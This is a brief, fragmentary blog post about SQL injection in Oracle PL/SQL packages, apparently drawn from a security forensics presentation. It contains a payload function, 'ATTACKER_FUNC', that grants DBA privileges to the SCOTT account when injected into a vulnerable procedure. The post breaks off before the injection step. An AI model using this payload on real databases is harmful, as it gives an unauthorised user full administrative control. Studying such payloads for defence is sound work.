SQL Injection in Oracle PL-SQL packages

SQL Injection in Oracle PL/SQL packages

Advanced Oracle Security Forensics at UKOUG

Example for 10g

CREATE OR REPLACE FUNCTION “SCOTT”.”ATTACKER_FUNC” return varchar2 authid current_user as pragma autonomous_transaction;

BEGIN EXECUTE IMMEDIATE ‘GRANT DBA TO SCOTT’;

COMMIT;

RETURN ‘ ‘;

END;

/

– Inject the function into the procedure….
and much mor can be cound at
User inserts their own SQL into the programs SQL.ppt

This entry was written by admin, posted on July 25, 2009 at 3:25 am, filed under Computer and tagged , , . Bookmark the permalink. Follow any comments here with the RSS feed for this post. Post a comment or leave a trackback: Trackback URL.

Post a Comment

Your email is never shared. Required fields are marked *

*
*

Powered by WP Hashcash